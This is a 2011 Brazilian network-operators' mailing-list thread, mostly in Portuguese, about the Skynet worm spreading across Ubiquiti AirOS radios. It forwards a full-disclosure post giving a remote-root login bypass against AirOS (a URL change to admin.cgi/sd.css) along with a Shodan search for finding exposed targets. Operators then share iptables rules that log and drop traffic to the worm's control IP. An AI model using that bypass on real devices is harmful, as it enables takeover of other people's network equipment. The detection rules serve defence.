[GTER] RES: Problema em firmwares dos produtos Ubiquity

mantunes mantunes.listas at gmail.com
Thu Dec 22 22:39:10 -02 2011


saiu na lista full-disclosure




---------- Forwarded message ----------
From: sd <sd at fucksheep.org>
Date: 2011/12/19
Subject: [Full-disclosure] AirOS remote root 0day
To: full-disclosure at lists.grok.org.uk


since some genius decided to write worm for this, here is early santa
for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

Em 22 de dezembro de 2011 14:04, Kivio Braga <kiviobraga at gmail.com> escreveu:
> Denilson,
>
>
>     E só para este IP que ele tenta dispara comunicação. Tive problemas
> relacionados com skynet, tive que fazer um script em expect para remover
> rc.poststart .skynet e trocar porta http em massa dos ubiquiti.
>     Não estava dando conta de retirar manualmente, por que ele se propaga
> de um radio para outro muito rápido.
>
>
>
>
> Em 22 de dezembro de 2011 12:25, Denilson Rocha <
> denilson_rocha at vertentes.com.br> escreveu:
>
>> De qualquer forma, mesmo que o IP esteja inalcançável, vale como
>> diagnóstico de infecção. Mas será só para este IP mesmo que envia alguma
>> coisa?
>>
>> Denilson
>>
>>
>>
>> Em Qui, 2011-12-22 às 10:52 -0200, Alexandre J. Correa - Onda Internet
>> escreveu:
>>
>> > Provavelmente a operadora ja colocou blackhole no ip..
>> >
>> > Disparando 178.216.144.75 com 32 bytes de dados:
>> > Resposta de 78.156.128.102: A vida útil (TTL) expirou em trânsito.
>> > Resposta de 78.156.128.101: A vida útil (TTL) expirou em trânsito.
>> > Resposta de 78.156.128.102: A vida útil (TTL) expirou em trânsito.
>> > Resposta de 78.156.128.102: A vida útil (TTL) expirou em trânsito.
>> >
>> >
>> >
>> > Em 21/12/2011 23:13, Kivio Braga escreveu:
>> > > Srs,
>> > >
>> > >
>> > >   Caso tenha necessidade de saber se sua rede esta infectada com
>> SKYNET, só
>> > > ativar as regras abaixo na borda da rede, e analisar os logs no
>> servidor.
>> > >
>> > > O script skynet, de tempo em tempo tentar enviar informações para este
>> > > IP:178.216.144.75.
>> > >
>> > >
>> > > EX:
>> > >
>> > > iptables -t filter -N SKYNET
>> > > iptables -t filter -A FORWARD -p tcp -d 178.216.144.75 -j SKYNET
>> > > iptables -t filter -A FORWARD -p tcp -s 178.216.144.75 -j SKYNET
>> > >
>> > > iptables -t filter -A SKYNET -s 178.216.144.75 -p tcp -j LOG
>> --log-prefix '
>> > > DROP ATAQUE_SKYNET_UBNT: '
>> > > iptables -t filter -A SKYNET -d 178.216.144.75 -p tcp -j LOG
>> --log-prefix '
>> > > DROP ATAQUE_SKYNET_UBNT: '
>> > > iptables -t filter -A SKYNET -s 178.216.144.75 -p tcp -j DROP
>> > > iptables -t filter -A SKYNET -d 178.216.144.75 -p tcp  -j DROP
>> > >
>> > >
>>
>>
>> --
>> gter list    https://eng.registro.br/mailman/listinfo/gter
>>
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter



-- 
Marcio Antunes
Powered by FreeBSD
==================================
* Windows: "Where do you want to go tomorrow?"
* Linux: "Where do you want to go today?"
* FreeBSD: "Are you, guys, comming or what?"



More information about the gter mailing list